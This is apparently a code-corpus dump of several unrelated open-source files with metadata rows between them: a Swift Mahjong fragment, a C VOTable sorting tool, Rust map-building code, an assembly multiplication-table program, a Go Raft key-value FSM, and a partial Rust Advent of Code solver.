        isMentu = Kotu.check(tile1: tile1, tile2: tile2, tile3: tile3)
        identifierTile = isMentu ? tile1 : Tile(rawValue: -1)!
    }

    // A valid triplet requires all three tiles to be identical.
    class func check(tile1: Tile, tile2: Tile, tile3: Tile) -> Bool {
        return tile1 == tile2 && tile2 == tile3
    }

    // Fu (minipoints): base 2, doubled when concealed, doubled again for a
    // terminal/honor (yaochu) tile.
    func getFu() -> Int {
        var fu = 2
        if !isOpen {
            fu *= 2
        }
        if identifierTile.isYaochu() {
            fu *= 2
        }
        return fu
    }

    static func <(lhs: Kotu, rhs: Kotu) -> Bool {
        return Int(lhs.identifierTile.rawValue) < Int(rhs.identifierTile.rawValue)
    }

    static func ==(lhs: Kotu, rhs: Kotu) -> Bool {
        return lhs.isOpen == rhs.isOpen
            && lhs.isMentu == rhs.isMentu
            && lhs.identifierTile == rhs.identifierTile
    }

    func hashCode() -> Int {
        let base = identifierTile.getCode() != -1 ? identifierTile.hashValue : 0
        var result = base
        result = 31 * result + (isMentu ? 1 : 0)
        result = 31 * result + (isOpen ? 1 : 0)
        return result
    }
}
| 24.621622 | 119 | 0.537322 | 3.359375 |
12945e83bc635180a7cd831333b79ac23fb0ba8e | 12,664 | c | C | voapps/votsort.c | olebole/voclient | abeee7783f4e84404a8c3a9646bb57f48988b24a | [
"MIT"
] | 2 | 2019-12-01T15:19:09.000Z | 2019-12-02T16:48:42.000Z | voapps/votsort.c | mjfitzpatrick/voclient | 3264c0df294cecc518e5c6a7e6b2aba3f1c76373 | [
"MIT"
] | 1 | 2019-11-30T13:48:50.000Z | 2019-12-02T19:40:25.000Z | voapps/votsort.c | mjfitzpatrick/voclient | 3264c0df294cecc518e5c6a7e6b2aba3f1c76373 | [
"MIT"
] | null | null | null | /*
* VOTSORT -- Sort a VOTable based on a column value.
*
* Usage:
* votsort [<otps>] <votable.xml>
*
* Where
* -c,--col <N> Sort column num
* -d,--desc Sort in descending order
* -f,--fmt <format> Output format
* -o,--output <name> Output name
* -s,--string String sort
* -t,--top <N> Print top <N> rows
* -i,--indent <N> XML indent level
* -n,--noheader Suppress header
* -N,--name <name> Find <name> column
* -I,--id <id> Find <id> column
* -U,--ucd <ucd> Find <ucd> column
*
* -h,--help This message
* -r,--return Return result
* -%,--test Run unit tests
*
* @file votsort.c
* @author Mike Fitzpatrick
* @date 6/03/12
*
* @brief Sort a VOTable based on a column.
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include "votParse.h" /* keep these in order! */
#include "voApps.h"
static int do_return = 0; /* return result? */
static int sort_order = 1; /* ascending order */
static int top = 0; /* top results (0 for all) */

/* A result buffer should be defined to point to the result object if it is
 * created dynamically, e.g. a list of votable columns. The task is
 * responsible for initially allocating this pointer and then resizing as
 * needed.
 */
#ifdef USE_RESBUF
#define SZ_RESBUF 8192

static char *resbuf;
#endif

/* Task specific option declarations. Task options are declared using the
 * getopt_long(3) syntax. Short options with a trailing ':' take a value.
 * NOTE(review): 'L' appears in the short-option string but has no matching
 * long option here -- TODO confirm it is handled (or dead) in votsort().
 */
int votsort (int argc, char **argv, size_t *len, void **result);

/* Task descriptor registered with the VOApps framework. */
static Task self = { "votsort", votsort, 0, 0, 0 };
static char *opts = "%:c:df:hi:LnN:I:U:o:rst:";
static struct option long_opts[] = {
    { "col", 1, 0, 'c'}, /* sort column num */
    { "desc", 2, 0, 'd'}, /* sort in descending order */
    { "fmt", 1, 0, 'f'}, /* output format */
    { "output", 1, 0, 'o'}, /* output name */
    { "string", 2, 0, 's'}, /* string sort */
    { "top", 1, 0, 't'}, /* string sort */
    { "indent", 1, 0, 'i'}, /* xml indent level */
    { "noheader", 2, 0, 'n'}, /* suppress header */
    { "name", 1, 0, 'N'}, /* find <name> column */
    { "id", 1, 0, 'I'}, /* find <id> column */
    { "ucd", 1, 0, 'U'}, /* find <ucd> column */
    { "help", 2, 0, 'h'}, /* --help is std */
    { "return", 2, 0, 'r'}, /* --return is std */
    { "test", 1, 0, '%'}, /* --test is std */
    { NULL, 0, 0, 0 }
};
/* All tasks should declare a static Usage() method to print the help
* text in response to a '-h' or '--help' flag. The help text should
* include a usage summary, a description of options, and some examples.
*/
static void Usage (void);
static void Tests (char *input);
extern int vot_isNumericField (handle_t field);
extern int vot_isValidFormat (char *fmt);
extern int vot_atoi (char *val);
extern int strdic (char *in_str, char *out_str, int maxchars, char *dict);
/**
 * Application entry point. All VOApps tasks MUST contain this
 * method signature.
 *
 * Sorts the input VOTable on the requested column (numerically when the
 * column holds scalar numeric values, lexically otherwise), optionally
 * keeps only the top <N> rows, and writes the table in the requested
 * output format.  Returns OK (0) on success, ERR (1) on any error.
 */
int
votsort (int argc, char **argv, size_t *reslen, void **result)
{
    /* These declarations are required for the VOApps param interface.
     */
    char **pargv, optval[SZ_FNAME], format[SZ_FORMAT];
    char *iname, *oname, *fmt = NULL;
    char *byName = NULL, *byID = NULL, *byUCD = NULL;
    int i = 0, ch = 0, status = OK, pos = 0, col = -1, do_string = 0;
    int vot, res, tab, data, tdata, field, tr;
    int indent = 0, scalar = 0, hdr = 1;
    /* Initialize result object whether we return an object or not.
     */
    *reslen = 0;
    *result = NULL;
    /* Initialize local task values.
     */
    iname = NULL;
    oname = NULL;
    /* Parse the argument list. The use of vo_paramInit() is required to
     * rewrite the argv[] strings in a way vo_paramNext() can be used to
     * parse them. The programmatic interface allows "param=value" to
     * be passed in, but the getopt_long() interface requires these to
     * be written as "--param=value" so they are not confused with
     * positional parameters (i.e. any param w/out a leading '-').
     *
     * NOTE(review): the early `return` paths below do not free pargv or
     * the strdup'ed option strings -- acceptable for a one-shot task,
     * but confirm if votsort() can be invoked repeatedly in-process.
     */
    pargv = vo_paramInit (argc, argv, opts, long_opts);
    while ((ch = vo_paramNext(opts,long_opts,argc,pargv,optval,&pos)) != 0) {
        if (ch > 0) {
            /* If the 'ch' value is > 0 we are parsing a single letter
             * flag as defined in the 'opts string.
             */
            switch (ch) {
            case '%': Tests (optval); return (self.nfail);
            case 'h': Usage (); return (OK);
            case 'c': col = vot_atoi (optval); break;
            case 'd': sort_order = -1; break;
            case 'f': if (!vot_isValidFormat ((fmt = strdup (optval)))) {
                fprintf (stderr, "Error: invalid format '%s'\n",
                    fmt);
                return (ERR);
                }
                break;
            case 'o': oname = strdup (optval); break;
            case 'i': indent = vot_atoi (optval); break;
            case 'n': hdr=0; break;
            case 'N': byName = strdup (optval); break;
            case 'I': byID = strdup (optval); break;
            case 'U': byUCD = strdup (optval); break;
            case 'r': do_return = 1; break;
            case 's': do_string = 1; break;
            case 't': top = vot_atoi (optval); break;
            default:
                fprintf (stderr, "Invalid option '%s'\n", optval);
                return (1);
            }
        } else if (ch == PARG_ERR) {
            return (ERR);
        } else {
            /* This code processes the positional arguments. The 'optval'
             * string contains the value but since this string is
             * overwritten w/ each arch we need to make a copy (and must
             * remember to free it later).
             */
            iname = strdup (optval);
            break; /* only allow one file */
        }
    }
    /* Sanity checks. Tasks should validate input and accept stdin/stdout
     * where it makes sense.
     */
    if (iname == NULL) iname = strdup ("stdin");
    if (oname == NULL) oname = strdup ("stdout");
    if (strcmp (iname, "-") == 0) { free (iname), iname = strdup ("stdin"); }
    if (strcmp (oname, "-") == 0) { free (oname), oname = strdup ("stdout"); }
    fmt = (fmt ? fmt : strdup ("xml"));
    /* Open the table. This also parses it.
     */
    if ( (vot = vot_openVOTABLE (iname) ) <= 0) {
        fprintf (stderr, "Error opening VOTable '%s'\n", iname);
        return (1);
    }
    res = vot_getRESOURCE (vot); /* get handles */
    if (vot_getLength (res) > 1) {
        fprintf (stderr, "Error: multiple RESOURCE elements not supported\n");
        status = ERR; /* BUGFIX: previously returned OK on this error */
        goto clean_up_;
    }
    if ((tab = vot_getTABLE (res)) <= 0) {
        status = ERR; /* BUGFIX: a missing TABLE is an error, not success */
        goto clean_up_;
    }
    if ((data = vot_getDATA (tab)))
        tdata = vot_getTABLEDATA (data);
    else {
        status = ERR; /* BUGFIX: a missing DATA element is an error */
        goto clean_up_;
    }
    /* Find the requested sort column. If the column isn't set explicitly
     * check each field for the name/id/ucd.
     */
    if (col < 0) {
        char *name, *id, *ucd;
        handle_t field;
        for (field=vot_getFIELD(tab); field; field=vot_getNext(field),i++) {
            id = vot_getAttr (field, "id");
            name = vot_getAttr (field, "name");
            ucd = vot_getAttr (field, "ucd");
            /* See whether this is a column we can sort numerically.
             */
            if (! do_string)
                scalar = vot_isNumericField (field);
            if ((byName && name && strcasecmp (name, byName) == 0) ||
                (byID && id && strcasecmp (id, byID) == 0) ||
                (byUCD && ucd && strcasecmp (ucd, byUCD) == 0)) {
                col = i, do_string = (do_string ? 1 : ! scalar);
                break;
            }
        }
    } else {
        register int i = 0;
        /* NOTE(review): if col exceeds the field count, 'field' becomes 0
         * here and is passed to vot_isNumericField() -- confirm that the
         * library tolerates a null handle.
         */
        for (field = vot_getFIELD(tab); field && i < col; i++)
            field = vot_getNext(field);
        if (! do_string)
            scalar = vot_isNumericField (field);
        do_string = (do_string ? 1 : ! scalar);
    }
    /* Sort the table.
     */
    (void) vot_sortTable (tdata, (col < 0 ? 0 : col), do_string, sort_order);
    /* Now trim the data rows if we've set a TOP condition.
     */
    if (top) {
        int row = 0, ntr = 0;
        /* Skip over the rows we'll keep
         */
        for (tr=vot_getTR (tdata); tr && row < top; tr=vot_getNext(tr))
            row++;
        /* Free the remaining rows.
         */
        for ( ; tr; tr = ntr) {
            ntr=vot_getNext(tr);
            vot_deleteNode (tr);
        }
    }
    /* Output the new format.
     */
    memset (format, 0, SZ_FORMAT);
    switch (strdic (fmt, format, SZ_FORMAT, FORMATS)) {
    case VOT: vot_writeVOTable (vot, oname, indent); break;
    case ASV: vot_writeASV (vot, oname, hdr); break;
    case BSV: vot_writeBSV (vot, oname, hdr); break;
    case CSV: vot_writeCSV (vot, oname, hdr); break;
    case TSV: vot_writeTSV (vot, oname, hdr); break;
    case HTML: vot_writeHTML (vot, iname, oname); break;
    case SHTML: vot_writeSHTML (vot, iname, oname); break;
    case FITS: vot_writeFITS (vot, oname); break;
    case ASCII: vot_writeASV (vot, oname, hdr); break;
    case XML: vot_writeVOTable (vot, oname, indent); break;
    case RAW: vot_writeVOTable (vot, oname, indent); break;
    default:
        fprintf (stderr, "Unknown output format '%s'\n", fmt);
        status = ERR;
    }
    /* Clean up. Remember to free whatever pointers were created when
     * parsing arguments.
     */
clean_up_:
    if (iname) free (iname);
    if (oname) free (oname);
    if (fmt) free (fmt);
    if (byID) free (byID);
    if (byUCD) free (byUCD);
    if (byName) free (byName);
    vo_paramFree (argc, pargv);
    vot_closeVOTABLE (vot);
    return (status); /* status must be OK or ERR (i.e. 0 or 1) */
}
/**
 * USAGE -- Print task help summary.
 *
 * Writes the usage text to stderr; the option list here must be kept in
 * sync with the 'opts' string and 'long_opts' table declared above.
 */
static void
Usage (void)
{
    fprintf (stderr, "\n Usage:\n\t"
        "votsort [<opts>] votable.xml\n\n"
        " Where\n"
        " -c,--col <N> Sort column num\n"
        " -d,--desc Sort in descending order\n"
        " -f,--fmt <format> Output format\n"
        " -o,--output <name> Output name\n"
        " -s,--string String sort\n"
        " -t,--top <N> Print top <N> rows\n"
        " -i,--indent <N> XML indent level\n"
        " -n,--noheader Suppress header\n"
        " -N,--name <name> Find <name> column\n"
        " -I,--id <id> Find <id> column\n"
        " -U,--ucd <ucd> Find <ucd> column\n"
        "\n"
        " -h,--help This message\n"
        " -r,--return Return result\n"
        " -%%,--test Run unit tests\n"
        "\n"
        " <format> is one of\n"
        " vot A new VOTable\n"
        " asv ascii separated values\n"
        " bsv bar separated values\n"
        " csv comma separated values\n"
        " tsv tab separated values\n"
        " html standalone HTML document\n"
        " shtml single HTML <table>\n"
        " fits FITS binary table\n"
        " ascii ASV alias\n"
        " xml VOTable alias\n"
        " raw VOTable alias\n"
        "\n"
        "\n"
        " Examples:\n\n"
        " 1) Sort a VOTable based on first column\n\n"
        " %% votsort test.xml\n"
        " %% votsort http://generic.edu/test.xml\n"
        " %% cat test.xml | votsort -o sort_test.xml\n"
        "\n"
        " A string sort will be done automatically if this is a\n"
        " string-valued column, otherwise a numeric sort is done.\n"
        "\n"
        " 2) Sort a VOTable based on the magnitude column\n\n"
        " %% votsort --name=id test.xml\n"
        "\n"
        " 3) Same as above, select 10 faintest stars\n\n"
        " %% votsort --name=id --desc --top=10 test.xml\n"
        "\n"
        " 4) String sort based on object name, output as CSV\n\n"
        " %% votsort -s -f csv test.xml\n"
        " %% votsort --string --fmt=csv test.xml\n"
        "\n"
    );
}
/**
 * Tests -- Task unit tests.
 *
 * Each vo_taskTest() call re-invokes the task with the given argument
 * vector (NULL-terminated); failures are tallied in self.nfail and
 * summarized by vo_taskTestReport().
 */
static void
Tests (char *input)
{
    Task *task = &self;
    vo_taskTest (task, "--help", NULL);
    vo_taskTest (task, input, NULL); // Ex 1
    vo_taskTest (task, "http://iraf.noao.edu/votest/sort.xml", NULL); // Ex 2
    vo_taskTest (task, "--name=id", input, NULL); // Ex 3
    vo_taskTest (task, "--name=id", "--desc", "--top=10", input, NULL); // Ex 4
    vo_taskTest (task, "-s", "-f", "csv", input, NULL); // Ex 5
    vo_taskTest (task, "--string", "--fmt=csv", input, NULL); // Ex 6
    /* NOTE(review): the tests above pass the Task by pointer but the
     * report call passes it by value -- confirm vo_taskTestReport()'s
     * expected signature.
     */
    vo_taskTestReport (self);
}
| 32.060759 | 79 | 0.540272 | 3.015625 |
ebab59acb824a2e93706e47c007e30c94a6b53ba | 4,898 | rs | Rust | map_model/src/make/buildings.rs | omalaspinas/abstreet | 43b31dcdbc6b7a599eceab3a17fa4e1fab72b691 | [
"Apache-2.0"
] | 2 | 2020-03-31T22:48:17.000Z | 2020-05-19T08:02:22.000Z | map_model/src/make/buildings.rs | omalaspinas/abstreet | 43b31dcdbc6b7a599eceab3a17fa4e1fab72b691 | [
"Apache-2.0"
] | null | null | null | map_model/src/make/buildings.rs | omalaspinas/abstreet | 43b31dcdbc6b7a599eceab3a17fa4e1fab72b691 | [
"Apache-2.0"
] | null | null | null | use crate::make::sidewalk_finder::find_sidewalk_points;
use crate::raw::{OriginalBuilding, RawBuilding};
use crate::{osm, Building, BuildingID, FrontPath, LaneID, LaneType, Map, OffstreetParking};
use abstutil::Timer;
use geom::{Distance, HashablePt2D, Line, PolyLine, Polygon};
use std::collections::{BTreeMap, HashSet};
/// Converts raw OSM buildings into map `Building`s.
///
/// For each raw building this finds the closest sidewalk point (within
/// 100m), builds a front path from the building center to that sidewalk,
/// and, when an adjacent driving lane exists with enough room, attaches
/// off-street parking with a driveway.  Buildings too far from any
/// sidewalk, or whose front path would have zero length, are dropped.
pub fn make_all_buildings(
    input: &BTreeMap<OriginalBuilding, RawBuilding>,
    map: &Map,
    timer: &mut Timer,
) -> Vec<Building> {
    timer.start("convert buildings");
    let mut center_per_bldg: BTreeMap<OriginalBuilding, HashablePt2D> = BTreeMap::new();
    let mut query: HashSet<HashablePt2D> = HashSet::new();
    timer.start_iter("get building center points", input.len());
    for (id, b) in input {
        timer.next();
        let center = b.polygon.center().to_hashable();
        center_per_bldg.insert(*id, center);
        query.insert(center);
    }
    // Skip buildings that're too far away from their sidewalk
    let sidewalk_pts = find_sidewalk_points(
        map.get_bounds(),
        query,
        map.all_lanes(),
        Distance::meters(100.0),
        timer,
    );
    let mut results = Vec::new();
    timer.start_iter("create building front paths", center_per_bldg.len());
    for (orig_id, bldg_center) in center_per_bldg {
        timer.next();
        if let Some(sidewalk_pos) = sidewalk_pts.get(&bldg_center) {
            let sidewalk_pt = sidewalk_pos.pt(map);
            if sidewalk_pt == bldg_center.to_pt2d() {
                timer.warn(format!(
                    "Skipping building {} because front path has 0 length",
                    orig_id
                ));
                continue;
            }
            let b = &input[&orig_id];
            // Start the front path on the building's border, not its center.
            let sidewalk_line =
                trim_path(&b.polygon, Line::new(bldg_center.to_pt2d(), sidewalk_pt));
            let id = BuildingID(results.len());
            let mut bldg = Building {
                id,
                polygon: b.polygon.clone(),
                address: get_address(&b.osm_tags, sidewalk_pos.lane(), map),
                name: b.osm_tags.get(osm::NAME).cloned(),
                osm_way_id: orig_id.osm_way_id,
                front_path: FrontPath {
                    sidewalk: *sidewalk_pos,
                    line: sidewalk_line.clone(),
                },
                amenities: b.amenities.clone(),
                parking: None,
                label_center: b.polygon.polylabel(),
            };
            // Can this building have a driveway? If it's not next to a driving lane, then no.
            let sidewalk_lane = sidewalk_pos.lane();
            if let Ok(driving_lane) = map
                .get_parent(sidewalk_lane)
                .find_closest_lane(sidewalk_lane, vec![LaneType::Driving])
            {
                let driving_pos = sidewalk_pos.equiv_pos(driving_lane, Distance::ZERO, map);
                // Require 7m of clearance from both lane ends so the driveway
                // doesn't spill into an intersection.
                let buffer = Distance::meters(7.0);
                if driving_pos.dist_along() > buffer
                    && map.get_l(driving_lane).length() - driving_pos.dist_along() > buffer
                {
                    let driveway_line = PolyLine::new(vec![
                        sidewalk_line.pt1(),
                        sidewalk_line.pt2(),
                        driving_pos.pt(map),
                    ]);
                    bldg.parking = Some(OffstreetParking {
                        public_garage_name: b.public_garage_name.clone(),
                        num_spots: b.num_parking_spots,
                        driveway_line,
                        driving_pos,
                    });
                }
            }
            if bldg.parking.is_none() {
                timer.warn(format!(
                    "{} can't have a driveway. Forfeiting {} parking spots",
                    bldg.id, b.num_parking_spots
                ));
            }
            results.push(bldg);
        }
    }
    timer.note(format!(
        "Discarded {} buildings that weren't close enough to a sidewalk",
        input.len() - results.len()
    ));
    timer.stop("convert buildings");
    results
}
/// Adjusts `path` so it starts on the building's border rather than at its
/// center: returns the segment from the first border intersection to the
/// sidewalk end, or the original path if no usable intersection is found.
fn trim_path(poly: &Polygon, path: Line) -> Line {
    poly.points()
        .windows(2)
        .filter_map(|edge_pts| {
            let edge = Line::new(edge_pts[0], edge_pts[1]);
            // Skip edges the path doesn't cross, and degenerate results
            // where the hit coincides with the path's endpoint.
            let hit = edge.intersection(&path)?;
            Line::maybe_new(hit, path.pt2())
        })
        .next()
        // No border edge intersects the path; give up and keep it as-is.
        .unwrap_or(path)
}
/// Formats a human-readable street address from OSM tags, falling back to
/// the sidewalk's parent road name (with "???" for missing pieces).
fn get_address(tags: &BTreeMap<String, String>, sidewalk: LaneID, map: &Map) -> String {
    let number = tags.get("addr:housenumber");
    if let Some(street) = tags.get("addr:street") {
        match number {
            Some(num) => format!("{} {}", num, street),
            None => format!("??? {}", street),
        }
    } else {
        // No street tag at all (even if a house number exists): use the road name.
        format!("??? {}", map.get_parent(sidewalk).get_name())
    }
}
| 37.106061 | 94 | 0.538587 | 3.0625 |
cae68b4d01dd94e0377b78e6e858beab62052611 | 2,080 | asm | Assembly | sources/mul_tab.asm | matteosev/mul_tab | e6571eb465ca87198acf17be8f807695244d7dea | [
"MIT"
] | 1 | 2020-04-19T07:14:37.000Z | 2020-04-19T07:14:37.000Z | sources/mul_tab.asm | matteosev/mul_tab | e6571eb465ca87198acf17be8f807695244d7dea | [
"MIT"
] | null | null | null | sources/mul_tab.asm | matteosev/mul_tab | e6571eb465ca87198acf17be8f807695244d7dea | [
"MIT"
] | null | null | null | ; args:
; 1: the table to display
; displays the multiplication table
%include "module.asm"
section .data
    x db " x ", 0
    equal db " = ", 0
    nl db 10 ; ascii code for new line (no NUL: printed with explicit length)
    msg db "Please enter an integer between 0 and 9 or a letter.", 10, 0
section .bss
    op1 resq 1 ; first operand (the requested table)
    op2 resq 1 ; second operand, counts 1..10
    res resq 1 ; product op1 * op2
    temp resq 1 ; scratch buffer for int_to_str
section .text
global _start
_start:
main:
    ; get args
    pop rax ; pop nb args
    cmp rax, 1 ; there's 1 argument by default : the path to the binary
    je wrong_arg ; if only 1 arg, it means user forgot to enter his arg
    times 2 pop rax ; pop path, 1st user arg
    mov al, byte [rax] ; get 1 char (because rax currently is a pointer)
    ; initialize the two operands with chars representing integer
    ; NOTE(review): the upper bytes of rax still hold the old pointer here,
    ; so [op1] gets that residue too -- presumably str_to_int with width 1
    ; only reads the low byte; confirm against module.asm.
    mov qword [op1], rax
    mov qword [op2], "0"
    mov rcx, 10 ; loop counter: print 10 lines of the table
    ; main loop
loop_mul:
    push rcx ; save counter state (macros below may clobber rcx)
    ; cast to int to calculate
    str_to_int op1, 1
    str_to_int op2, 1
    ; calculations
    inc byte [op2] ; increment 2nd operand
    mov al, byte [op2] ; move 2nd operand in al for multiplication
    mul byte [op1] ; mul al (op2) by op1 to get result
    mov qword [res], rax ; put result in res
    ; cast to str to display
    int_to_str op1, temp
    int_to_str op2, temp
    int_to_str res, temp
    ; display one line: "op1 x op2 = res"
    print op1, 1
    print x, 0
    print op2, 2
    print equal, 0
    print res, 3
    print nl, 1
    ; verify that we are still in the range we target
    pop rcx ; restore counter
    dec rcx ; decrement counter
    jnz loop_mul ; if counter != 0, continue looping
    jmp end ; else finish program
wrong_arg:
    print msg, 0
end:
    exit
dd6032ac0651900ceecf67e713af0bbc22928a18 | 2,792 | go | Go | store/fsm.go | makersu/go-raft-kafka | 02d37c3ce6e6cac5738165fad6b91638c913c01c | [
"MIT"
] | null | null | null | store/fsm.go | makersu/go-raft-kafka | 02d37c3ce6e6cac5738165fad6b91638c913c01c | [
"MIT"
] | null | null | null | store/fsm.go | makersu/go-raft-kafka | 02d37c3ce6e6cac5738165fad6b91638c913c01c | [
"MIT"
] | null | null | null | package store
/**
// FSM provides an interface that can be implemented by
// clients to make use of the replicated log.
type FSM interface {
// Apply log is invoked once a log entry is committed.
// It returns a value which will be made available in the
// ApplyFuture returned by Raft.Apply method if that
// method was called on the same Raft node as the FSM.
Apply(*Log) interface{}
// Snapshot is used to support log compaction. This call should
// return an FSMSnapshot which can be used to save a point-in-time
// snapshot of the FSM. Apply and Snapshot are not called in multiple
// threads, but Apply will be called concurrently with Persist. This means
// the FSM should be implemented in a fashion that allows for concurrent
// updates while a snapshot is happening.
Snapshot() (FSMSnapshot, error)
// Restore is used to restore an FSM from a snapshot. It is not called
// concurrently with any other command. The FSM must discard all previous
// state.
Restore(io.ReadCloser) error
}
**/
import (
"encoding/json"
"fmt"
"io"
"log"
"os"
"sync"
"github.com/hashicorp/raft"
)
// command is the payload serialized into each Raft log entry; Op selects
// the operation ("set" is the only one handled by Apply) and Key/Value
// carry its arguments.
type command struct {
	Op    string `json:"op,omitempty"`
	Key   string `json:"key,omitempty"`
	Value string `json:"value,omitempty"`
}
// NodeFSM is the node's replicated state machine: an in-memory key-value
// store mutated only through committed Raft log entries.
type NodeFSM struct {
	// db DB
	mutex  sync.Mutex         // guards m
	m      map[string]string  // The key-value store for the system.
	logger *log.Logger
}
// NewNodeFSM creates a ready-to-use state machine for the Raft node.
//
// BUGFIX: the key-value map must be allocated here. It was previously left
// nil, and applySet's `fsm.m[key] = value` panics when assigning to an
// entry of a nil map.
func NewNodeFSM() *NodeFSM {
	return &NodeFSM{
		m:      make(map[string]string),
		logger: log.New(os.Stderr, "[fsm] ", log.LstdFlags),
	}
}
// Apply applies a Raft log entry to the key-value store.
//
// Called by the Raft library once an entry is committed; panics on a
// malformed payload or unknown op, which aborts the node rather than
// silently diverging from its peers.
func (fsm *NodeFSM) Apply(l *raft.Log) interface{} {
	var c command
	if err := json.Unmarshal(l.Data, &c); err != nil {
		panic(fmt.Sprintf("failed to unmarshal command: %s", err.Error()))
	}
	// fsm.logger.Println("c", c)
	switch c.Op {
	case "set":
		return fsm.applySet(c.Key, c.Value)
	// case "delete":
	// 	return f.applyDelete(c.Key)
	default:
		panic(fmt.Sprintf("unrecognized command op: %s", c.Op))
	}
}
// applySet stores value under key, holding the mutex for the duration.
// Always returns nil; the return feeds Raft.Apply's ApplyFuture.
func (fsm *NodeFSM) applySet(key, value string) interface{} {
	fsm.logger.Printf("apply %s to %s\n", key, value)
	fsm.mutex.Lock()
	defer fsm.mutex.Unlock()
	fsm.m[key] = value
	return nil
}
// Snapshot returns a snapshot of the key-value store.
//
// The map is cloned under the lock so the snapshot's Persist can run
// concurrently with further Apply calls, as the raft.FSM contract requires.
func (f *NodeFSM) Snapshot() (raft.FSMSnapshot, error) {
	f.mutex.Lock()
	defer f.mutex.Unlock()
	// Clone the map.
	o := make(map[string]string)
	for k, v := range f.m {
		o[k] = v
	}
	return &fsmSnapshot{store: o}, nil
}
// Restore stores the key-value store to a previous state.
//
// Decodes the snapshot stream and replaces the entire map; all prior
// state is discarded per the raft.FSM contract.
func (f *NodeFSM) Restore(rc io.ReadCloser) error {
	o := make(map[string]string)
	if err := json.NewDecoder(rc).Decode(&o); err != nil {
		return err
	}
	// Set the state from the snapshot, no lock required according to
	// Hashicorp docs.
	f.m = o
	return nil
}
| 24.491228 | 75 | 0.690186 | 3.09375 |
be4a207ee408e3ed6964c176e53c02fa322f5df5 | 4,927 | rs | Rust | 2019/day14/src/main.rs | dcoles/advent-of-code | 4d480934daad60fcdb2112ef66f4115d9cb83ac2 | [
"MIT"
] | 2 | 2021-12-01T06:47:00.000Z | 2021-12-02T20:09:40.000Z | 2019/day14/src/main.rs | dcoles/advent-of-code | 4d480934daad60fcdb2112ef66f4115d9cb83ac2 | [
"MIT"
] | null | null | null | 2019/day14/src/main.rs | dcoles/advent-of-code | 4d480934daad60fcdb2112ef66f4115d9cb83ac2 | [
"MIT"
] | null | null | null | use std::{fs, fmt};
use std::path::Path;
use std::collections::{HashMap, VecDeque};
/// A chemical is identified by its name.
type Chemical = String;
// Raw input chemical and final product names used by the solver.
const ORE: &str = "ORE";
const FUEL: &str = "FUEL";
// Ore budget for part 2.
const TRILLION: u64 = 1_000_000_000_000;
/// Entry point: validates the solver against the puzzle's sample inputs
/// (asserts panic on regression), then prints both answers for input.txt.
fn main() {
    let input = read_input("input.txt");
    // Part 1
    assert_eq!(31, required_ore(&read_input("sample1.txt"), 1));
    assert_eq!(165, required_ore(&read_input("sample2.txt"), 1));
    assert_eq!(13312, required_ore(&read_input("sample3.txt"), 1));
    assert_eq!(180697, required_ore(&read_input("sample4.txt"), 1));
    assert_eq!(2210736, required_ore(&read_input("sample5.txt"), 1));
    println!("Part 1: Required ore: {}", required_ore(&input, 1));
    // Part 2
    assert_eq!(82892753, maximum_fuel(&read_input("sample3.txt"), TRILLION));
    assert_eq!(5586022, maximum_fuel(&read_input("sample4.txt"), TRILLION));
    assert_eq!(460664, maximum_fuel(&read_input("sample5.txt"), TRILLION));
    println!("Part 2: Maximum fuel: {}", maximum_fuel(&input, TRILLION));
}
/// Find the amount of ore required for n-units of fuel
///
/// Works backwards from FUEL with a breadth-first expansion of
/// requirements, reusing surplus chemicals left over from earlier
/// whole-number reaction runs.
fn required_ore(reactions: &[Reaction], fuel: u64) -> u64 {
    let reactant_map = build_reactant_map(reactions);
    let mut required_ore = 0;
    // Queue of required chemicals
    let mut requirements = VecDeque::new();
    requirements.push_back((FUEL, fuel));
    // Surplus from previous reactions
    let mut chemical_surplus = HashMap::new();
    // Run required reactions
    while let Some((chemical, mut quantity)) = requirements.pop_front() {
        if chemical == ORE {
            required_ore += quantity;
        } else {
            // Can we use some surplus?
            if let Some(&surplus) = chemical_surplus.get(chemical) {
                let consumed = quantity.min(surplus);
                chemical_surplus.insert(chemical, surplus - consumed);
                quantity -= consumed;
                // No need to run if we have enough surplus
                if quantity == 0 {
                    continue;
                }
            }
            // How many times do we need to run a reaction?
            // (ceiling division: reactions only run in whole units)
            let reaction = &reactant_map[chemical];
            let n_reactions = (quantity - 1) / reaction.quantity + 1;
            // How much reactants do we need?
            for (chem, &n) in &reaction.reactants {
                let amount = n * n_reactions;
                requirements.push_back((chem, amount));
            }
            // Collect surplus
            let surplus = reaction.quantity * n_reactions - quantity;
            *chemical_surplus.entry(chemical).or_default() += surplus;
        }
    }
    required_ore
}
/// Find the maximum amount of fuel a fixed amount of ore can produce
///
/// Repeated exponential (galloping) search: each pass finds the largest
/// power-of-two step that still fits the ore budget and advances by it,
/// until no step of size 1 fits.
/// NOTE(review): the `< ore` comparison rejects a candidate that uses the
/// budget exactly; confirm whether `<=` is intended for that edge case.
fn maximum_fuel(reactions: &[Reaction], ore: u64) -> u64 {
    let mut fuel = 0;
    // Do an exponential search for the required fuel
    loop {
        let mut n = 0;
        while required_ore(reactions, fuel + 2u64.pow(n)) < ore {
            n += 1;
        }
        if n > 0 {
            fuel += 2u64.pow(n - 1);
        } else {
            // Found the maximum
            break;
        }
    }
    fuel
}
/// Reads a reaction list from `path`, one `reactants => N PRODUCT` rule
/// per line. Panics if the file cannot be read or a line is malformed.
fn read_input<T: AsRef<Path>>(path: T) -> Vec<Reaction> {
    let contents = fs::read_to_string(path).expect("Failed to read input");
    contents
        .lines()
        .map(|line| {
            let halves: Vec<_> = line.split("=>").collect();
            let reactants = parse_chemical_list(halves[0]);
            let (product, quantity) = parse_chemical(halves[1]);
            Reaction { reactants, product, quantity }
        })
        .collect()
}
/// Parse a list of chemicals quantities, `N CHEMICAL, ...`
fn parse_chemical_list(list: &str) -> HashMap<Chemical, u64> {
let mut result = HashMap::new();
for (c, n) in list.split(',').map(|value| parse_chemical(value)) {
result.insert(c, n);
}
result
}
/// Parse a single chemical quantity, `N CHEMICAL`
///
/// Robustness fix: `split_whitespace` tolerates leading/trailing blanks
/// and runs of spaces or tabs, where the previous `trim().split(' ')`
/// produced empty tokens (and a wrong chemical name) on a double space.
fn parse_chemical(value: &str) -> (Chemical, u64) {
    let mut parts = value.split_whitespace();
    let n: u64 = parts
        .next()
        .expect("Missing quantity")
        .parse()
        .expect("Failed to parse quantity");
    let chemical = parts.next().expect("Missing chemical name").to_owned();
    (chemical, n)
}
/// Build a mapping from Chemical to its associated reaction
///
/// Each product name appears in exactly one reaction, so collecting the
/// (product, reaction) pairs loses nothing.
